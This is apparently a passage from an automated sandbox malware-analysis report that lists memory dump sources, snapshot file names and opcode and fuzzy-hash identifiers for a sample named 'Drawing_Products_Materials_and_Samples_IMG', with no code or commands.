                                                                                      • Opcode Fuzzy Hash: 98810c7e492aa9380e28c562036934bbc9c11ce1e87e106bdf5607afb438adef
                                                                                      • Instruction Fuzzy Hash: B3C1B074E00318CFEB54DFA5C984B9DBBB2BF89304F6081A9D809AB354DB359A81CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22ff675a82622a8c63474ed86a41bf87ca68c8b90d4a064ebab182b84ab3e1fe
                                                                                      • Instruction ID: 89ec77f1d78308dff57f1ea305840b88f7b4d0cf4d591d74aa5ed6b68d6fb265
                                                                                      • Opcode Fuzzy Hash: 22ff675a82622a8c63474ed86a41bf87ca68c8b90d4a064ebab182b84ab3e1fe
                                                                                      • Instruction Fuzzy Hash: 08C1B074E01318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bdfff040c3d842095d23240c7a39e79cbbb2eb325e483ab0d94d0f4c7f5d7ddc
                                                                                      • Instruction ID: 4d779b8b4e9a9a12a2a73daed1e4049f289a2d9b291d610f03687b15cd5a296d
                                                                                      • Opcode Fuzzy Hash: bdfff040c3d842095d23240c7a39e79cbbb2eb325e483ab0d94d0f4c7f5d7ddc
                                                                                      • Instruction Fuzzy Hash: 85C1AF74E01318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e86cfd2022d02963653d99d1598aa3abe9b14b60f986deb15aa6837659e6609
                                                                                      • Instruction ID: e80090c401df3dd038d02c00af2d85e27dcb94a1153dddfbdc84148431781bdf
                                                                                      • Opcode Fuzzy Hash: 5e86cfd2022d02963653d99d1598aa3abe9b14b60f986deb15aa6837659e6609
                                                                                      • Instruction Fuzzy Hash: 49C1B274E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 010db19c0f0f1cac528858fd44139eb3cc6e4c6a9d2f46b8be8955d331fd3169
                                                                                      • Instruction ID: 4e29c03027de993614c48eccf11b5aab7e669fd86751565057b3b620c5a16c81
                                                                                      • Opcode Fuzzy Hash: 010db19c0f0f1cac528858fd44139eb3cc6e4c6a9d2f46b8be8955d331fd3169
                                                                                      • Instruction Fuzzy Hash: AFC1AF74E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 04cc71d622619ff555a6a77790d23d3d701d913a944090862aca5601137f313c
                                                                                      • Instruction ID: f241f3ca85f9996f3bfce034e2568cd0c9665e6364f0f5774550cea072cb8625
                                                                                      • Opcode Fuzzy Hash: 04cc71d622619ff555a6a77790d23d3d701d913a944090862aca5601137f313c
                                                                                      • Instruction Fuzzy Hash: 5AC1BF74E00318CFEB54DFA5C994B9DBBB2BF89304F2081A9D809AB355DB349A81CF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a0d83842c7f3b919de5007eff975cbdf69c44cca69640aa93428522c74db755c
                                                                                      • Instruction ID: bae9a0e11b035bc6df41f84da5b64f12cc8b2d1158860b933f450d0144f753ad
                                                                                      • Opcode Fuzzy Hash: a0d83842c7f3b919de5007eff975cbdf69c44cca69640aa93428522c74db755c
                                                                                      • Instruction Fuzzy Hash: 6BC1C074E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A85CF15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 66632c6c419e74a8c0224bf1c849b0c796381dcc7b4c027a82573b20460d8b99
                                                                                      • Instruction ID: e6bba75e7dee2fd092957d04344214c8ea6e2340173ff7495671951ac707fa3e
                                                                                      • Opcode Fuzzy Hash: 66632c6c419e74a8c0224bf1c849b0c796381dcc7b4c027a82573b20460d8b99
                                                                                      • Instruction Fuzzy Hash: 35C1B074E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB349A85CF11
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a05b21f0f28e85b9d47c8dca66e79de539f4ca32af103cc4f4371bce3c34b9bf
                                                                                      • Instruction ID: 98b97b241d96904d3fa4543696f5b6e08f7f731a9d3d9fce26f4b5ba8bd0b8f7
                                                                                      • Opcode Fuzzy Hash: a05b21f0f28e85b9d47c8dca66e79de539f4ca32af103cc4f4371bce3c34b9bf
                                                                                      • Instruction Fuzzy Hash: F9619774E01219CFEB68DF66D940B9DBBB2BF88300F14C1A9D409B7655DB315A82EF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 54b9477378a0c2824763ffe27926fd222a42fef0417d7128b2b601037cef2814
                                                                                      • Instruction ID: 0ad52e15df040d005d05d01e708868d5a8399199259df851c9e3d9a8176075fc
                                                                                      • Opcode Fuzzy Hash: 54b9477378a0c2824763ffe27926fd222a42fef0417d7128b2b601037cef2814
                                                                                      • Instruction Fuzzy Hash: 07410271E0160C8BEB14DFAAD9446DEBBF2AF8A300F20912AC819BB255DB345946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ae7b9b09cbfaec95f72802b7ded28841e7372985b998be4116c174bee53e3d0
                                                                                      • Instruction ID: 0b30ec357271c1b1cefc244e1cb6c349af748cc8db6a04d7505fe913059f1214
                                                                                      • Opcode Fuzzy Hash: 2ae7b9b09cbfaec95f72802b7ded28841e7372985b998be4116c174bee53e3d0
                                                                                      • Instruction Fuzzy Hash: 1241E2B1D012189BEB18CFAAD8883CEBBF2BF89314F24C52AD408AB294DB744545CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7e5ed221d3409322a263158370f9bc091c066cc15ea7fe70ec6599c12502eb4c
                                                                                      • Instruction ID: ed822be30e66e8acf5d65c81aa28b2bde0af715d3be34bc0e910ebb1f9549244
                                                                                      • Opcode Fuzzy Hash: 7e5ed221d3409322a263158370f9bc091c066cc15ea7fe70ec6599c12502eb4c
                                                                                      • Instruction Fuzzy Hash: 9E41F674D016488BEB14DFAAD9446DEFBF2BF89304F20D12AC418BB259DB345A46CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48b0fadc4e44dc4f643dc71c05672b2c83ca082a601487324cbecf9bb0d66d30
                                                                                      • Instruction ID: 41bcc24b13d3052f661d9e2763e8bb2d04b2e911e3e199829d4072ded90589cb
                                                                                      • Opcode Fuzzy Hash: 48b0fadc4e44dc4f643dc71c05672b2c83ca082a601487324cbecf9bb0d66d30
                                                                                      • Instruction Fuzzy Hash: 3531D374E0124CCBEB18DFAAD9506DEBBF2BF89300F24D12AD818AB255DB345942CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 38d8b52e4a4f98e28bad28db63d8b07c785e9f41d8b1cdcc6b8277be65b06fec
                                                                                      • Instruction ID: e082803a6e6b5dbeb4054768044bc181d014a07f1eabcb49b3dd31c9537c53ee
                                                                                      • Opcode Fuzzy Hash: 38d8b52e4a4f98e28bad28db63d8b07c785e9f41d8b1cdcc6b8277be65b06fec
                                                                                      • Instruction Fuzzy Hash: 5541D375E0560C8BEB18DFAAC9546DEFBF2AF89300F20D12AC818BB255DB354946CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c82a407b6fe576da17a2f7fde442cacbed94831e41eba036d3fb1b14308bc11b
                                                                                      • Instruction ID: 54f7a03ff8d939a9fc7afb1dcbfd89bda0f28fe1b5e351062d6357edf72c2df7
                                                                                      • Opcode Fuzzy Hash: c82a407b6fe576da17a2f7fde442cacbed94831e41eba036d3fb1b14308bc11b
                                                                                      • Instruction Fuzzy Hash: 3441D670D0164C8BEB18DFAAD9546DEFBF2AF89300F20D12AC818BB255DB354945CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf84955562bfb51511b99e158fc1dfa263444cf9e672db35a83bc03240e024c8
                                                                                      • Instruction ID: 5e71843bb77444d44474af99c879f97beea966c494b168a65599386e4e7739e1
                                                                                      • Opcode Fuzzy Hash: cf84955562bfb51511b99e158fc1dfa263444cf9e672db35a83bc03240e024c8
                                                                                      • Instruction Fuzzy Hash: A041F374D00648CBEB18EFAAD9546DEBBF2AF89300F20C12AC818BB255DB344946CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0959d0464fdfdd490362085cc1587055fc0029eeb39204f858daec3b85be5c21
                                                                                      • Instruction ID: b63886a8756a1f5e545cfc11f410766b694285ac69263476e5508317b6ad5fa4
                                                                                      • Opcode Fuzzy Hash: 0959d0464fdfdd490362085cc1587055fc0029eeb39204f858daec3b85be5c21
                                                                                      • Instruction Fuzzy Hash: 6F41D3B4D01608CBEB18DFAAD9446DEBBF2AF89304F20D12AC418BB259DB355946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68976330e8077dd252523efefea66858605829414ba0b8f956546794339576bb
                                                                                      • Instruction ID: 5ad4c1cb5a2bda497c109b223d4de154b3e83af45ef4830314f456c5745f2ab6
                                                                                      • Opcode Fuzzy Hash: 68976330e8077dd252523efefea66858605829414ba0b8f956546794339576bb
                                                                                      • Instruction Fuzzy Hash: CC41F674E01648CFEB18DFAAC9446DDBBF2AF89304F20D12AC418BB258DB345946CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8562ee8e4220c7ac18598b80b93ed6f504ae2969c6ee2841f3d2d33e47e61ae8
                                                                                      • Instruction ID: af92d51f246c518718546900f9feef5fb3132f9e2791284bff757b39004c8310
                                                                                      • Opcode Fuzzy Hash: 8562ee8e4220c7ac18598b80b93ed6f504ae2969c6ee2841f3d2d33e47e61ae8
                                                                                      • Instruction Fuzzy Hash: 2E41E5B4D05648CBEB14DFAAC9546DEFBF2AF89304F20D12AC418BB259DB385946CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d3a84b3e28720a8ab77f46e207bdb75cc6d9d1c5f71627f013ccb6c8eb3827e
                                                                                      • Instruction ID: 6658587cadd8c4581846da50569bb08fb191b36297180c04ecef1b9a6b51793d
                                                                                      • Opcode Fuzzy Hash: 6d3a84b3e28720a8ab77f46e207bdb75cc6d9d1c5f71627f013ccb6c8eb3827e
                                                                                      • Instruction Fuzzy Hash: 1F4108B4D01248CBEB14CFAAD9547DEBBF2AF89304F20D12AC418BB259DB355906CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b90ae3a0f6d4168594ba207e3c72bb8151123b66a20a87b1a6b339f20b082813
                                                                                      • Instruction ID: 89ee877c921decb9fc5cd7805e8bb97e9b2a4402f8ccb34ffd558752762b6158
                                                                                      • Opcode Fuzzy Hash: b90ae3a0f6d4168594ba207e3c72bb8151123b66a20a87b1a6b339f20b082813
                                                                                      • Instruction Fuzzy Hash: 9841F6B4E052488BEB14DFAAC9446DEFBF2AF89304F20D12AC418BB258DB345946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c308ee161c1ca64d0b5882d84cc3529372b8c06d448eacf19293d0691af48d37
                                                                                      • Instruction ID: f64d3eda3b313c6ccc71a4e39637a2243461c062e459bbf99d96aad679d612ae
                                                                                      • Opcode Fuzzy Hash: c308ee161c1ca64d0b5882d84cc3529372b8c06d448eacf19293d0691af48d37
                                                                                      • Instruction Fuzzy Hash: 1341E5B4D0164CCBEB18DFAAD9446DEBBF2AF89304F20D12AC418BB259DB345946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf16650acf4c84ff6fc16d54731f1ebc10ef2e4fa71d04ecf2b069a252640c45
                                                                                      • Instruction ID: ef4ea84c0653ae694e8f3d59e54d2555757907420f5330055985adf952721a39
                                                                                      • Opcode Fuzzy Hash: cf16650acf4c84ff6fc16d54731f1ebc10ef2e4fa71d04ecf2b069a252640c45
                                                                                      • Instruction Fuzzy Hash: 7A41E5B4D016488BEB14CFAAC9446DDFBF2AF89304F24D129C418BB258DB345945CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6300f21af6d106548d6de25f3417233a15cfe077f42fdc33d26d406a9309ae9d
                                                                                      • Instruction ID: cf94cf84e532b5318fdcef0fcdec6fa438ec13ed4d94862d40244b95dd4c3f01
                                                                                      • Opcode Fuzzy Hash: 6300f21af6d106548d6de25f3417233a15cfe077f42fdc33d26d406a9309ae9d
                                                                                      • Instruction Fuzzy Hash: B741E5B4E01248CBEB18DFAAD5547DDBBF2AF89304F20D12AC418BB259DB345946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac53b29fb2c2b81b8f2c4f55a2b6da467c1982db3922dabef5e98593360ec13a
                                                                                      • Instruction ID: 5cc6838243fa14a85dd7e5ef767350e5895885dc0f7187ca2c7b6f771a3d27a6
                                                                                      • Opcode Fuzzy Hash: ac53b29fb2c2b81b8f2c4f55a2b6da467c1982db3922dabef5e98593360ec13a
                                                                                      • Instruction Fuzzy Hash: 2641E3B4D0520CCBEB18DFAAC9546DEFBF2AF89304F20D12AC418AB258DB345946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e52d882ff1d94bea152a9349325864d60c77e26be23a2d073b0bb1a55f94f319
                                                                                      • Instruction ID: 29592e6dffd46c4e2135db381166295a38e81b7575fa97b0dfc9ae6cbeb58312
                                                                                      • Opcode Fuzzy Hash: e52d882ff1d94bea152a9349325864d60c77e26be23a2d073b0bb1a55f94f319
                                                                                      • Instruction Fuzzy Hash: CA410574E0124CCBEB18CFAAC9546DDBBF2AF89304F20D12AC418BB259DB345946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a117231a9ff7992115d19a9ad5ea935a92455fefc141cb4c95defe97be3d50a0
                                                                                      • Instruction ID: 88da958e9569a393e664fd352e5d1d950fa8ef891a8cc37c6a76bf6c0cdebc65
                                                                                      • Opcode Fuzzy Hash: a117231a9ff7992115d19a9ad5ea935a92455fefc141cb4c95defe97be3d50a0
                                                                                      • Instruction Fuzzy Hash: 4541E5B4D01248CBEB18DFAAD9586DDBBF2AF89304F20D12AC418BB259DB345946CF04
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0f6c10633371a7f833ada4a230bceba6e52c295124c76484488e58b84f52210d
                                                                                      • Instruction ID: 5c5c04f3cef7688ddb23bea548bf1fe0919fc89dfaacdce98034db77127fc565
                                                                                      • Opcode Fuzzy Hash: 0f6c10633371a7f833ada4a230bceba6e52c295124c76484488e58b84f52210d
                                                                                      • Instruction Fuzzy Hash: 5041A0B4D022199FDB00DFA8D594BAEBBF2BF49304F1094A9E414B7390E7389A45CF94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 838fd571e9c8c7bdbdc55a3c57a7477b6a2b3738b98a07deb513396f0907e4f7
                                                                                      • Instruction ID: c323b7bf4cb9d149cbad43362cb48ba3e3d684d350cddf695c479b4cd2a81163
                                                                                      • Opcode Fuzzy Hash: 838fd571e9c8c7bdbdc55a3c57a7477b6a2b3738b98a07deb513396f0907e4f7
                                                                                      • Instruction Fuzzy Hash: 5731C774E01258CBEB14DFAAD9546DDBBF2AF89300F20D12AC818BB258EB345946CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 92bb8cf962cfb92708e1bf0e5d4f6d5951d8446f19a52af6eb6f1f81d17fcb35
                                                                                      • Instruction ID: 8522cc9a941de55d927b152c2d1efa977526ef05ecf6522106ee4b01a62f0aca
                                                                                      • Opcode Fuzzy Hash: 92bb8cf962cfb92708e1bf0e5d4f6d5951d8446f19a52af6eb6f1f81d17fcb35
                                                                                      • Instruction Fuzzy Hash: 3131D674E016088BEB44DFAAD9406DDBBF3AF8A300F24D12AC818BB254EB345942CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd